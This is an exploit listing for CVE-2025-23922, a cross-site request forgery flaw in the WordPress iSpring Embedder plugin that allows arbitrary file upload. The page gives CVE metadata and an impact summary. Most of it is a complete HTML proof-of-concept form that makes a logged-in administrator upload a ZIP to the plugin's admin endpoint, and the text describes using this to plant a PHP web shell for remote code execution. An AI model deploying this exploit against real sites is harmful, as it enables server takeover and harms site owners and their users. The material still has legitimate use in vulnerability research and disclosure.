Share
## https://sploitus.com/exploit?id=PACKETSTORM:189967
# CVE-2025-23922 - WordPress iSpring Embedder CSRF to Arbitrary File Upload
### ๐ CVE Details
- **CVE ID:** CVE-2025-23922
- **Published:** 2025-01-16
- **Plugin Affected:** WordPress iSpring Embedder plugin
- **Versions Affected:** <= 1.0
- **Author of Plugin:** Harsh
- **Vulnerability Type:** Cross-Site Request Forgery (CSRF) โ Arbitrary File Upload
- **CWE ID:** [CWE-352: Cross-Site Request Forgery (CSRF)](https://cwe.mitre.org/data/definitions/352.html)
- **CVSS Score:** 10.0 (Critical)
- **Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
---
### ๐ฅ Description
A **CSRF vulnerability** in the **iSpring Embedder WordPress plugin** allows an unauthenticated remote attacker to **trick an authenticated administrator** into uploading arbitrary files (such as a PHP web shell) to the server.
The vulnerable endpoint does not implement any CSRF protection, and the file upload feature accepts `.zip` files, which are extracted to the following location:
```
/wp-content/uploads/iSpring_embedder/
```
---
### ๐ก Impact
An attacker can:
- Trigger file uploads without authentication.
- Gain remote code execution (RCE) by uploading a malicious PHP file inside a ZIP archive.
- Compromise the entire web server by chaining this with a crafted web shell.
---
### ๐ Proof-of-Concept (PoC) Exploit (HTML)
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF File Upload Exploit</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
padding: 20px;
}
.container {
background: #fff;
padding: 25px;
border-radius: 10px;
box-shadow: 0 0 10px rgba(0,0,0,0.1);
max-width: 600px;
margin: auto;
}
h1 {
color: #d9534f;
}
input[type="file"],
input[type="submit"] {
margin-top: 10px;
padding: 10px;
font-size: 16px;
}
.footer {
margin-top: 30px;
font-size: 14px;
color: #777;
text-align: center;
}
</style>
</head>
<body>
<div class="container">
<h1>CSRF Exploit โ File Upload</h1>
<p>
This is a proof-of-concept (PoC) exploit for the following vulnerability:
</p>
<ul>
<li><strong>Vulnerability:</strong> CSRF leading to Arbitrary File Upload</li>
<li><strong>Plugin:</strong> iSpring Embedder for WordPress (<= v1.0)</li>
<li><strong>CVE:</strong> CVE-2025-23922</li>
<li><strong>Impact:</strong> Remote attackers can coerce an authenticated administrator to upload arbitrary files, potentially including web shells.</li>
<li><strong>Upload Path:</strong> <code>/wp-content/uploads/iSpring_embedder/</code></li>
</ul>
<form id="csrfForm" action="http://wordpresssite/wp-admin/admin.php?page=ispring-embedder" method="POST" enctype="multipart/form-data">
<label><strong>Select ZIP file to upload:</strong></label><br>
<input type="file" name="zip_file" required><br>
<input type="hidden" name="file_name" value="exploit_csrf">
<input type="submit" name="submit_ispring_form" value="Upload File via CSRF">
</form>
<div class="footer">
<p>
Exploit for <strong>CSRF to Arbitrary File Upload vulnerability</strong><br>
<strong>CVE-2025-23922</strong><br>
Developed by <strong>Nxploit | Khaled Alenazi</strong>
</p>
</div>
</div>
</body>
</html>
```
---
---
### โ ๏ธ Disclaimer
This proof-of-concept is provided for educational and research purposes only.
The author is not responsible for any misuse or damage caused by this exploit.
**Nxploit | Khaled Alenazi**
Security Researcher & Exploit Developer
[https://github.com/Nxploit](https://github.com/Nxploited)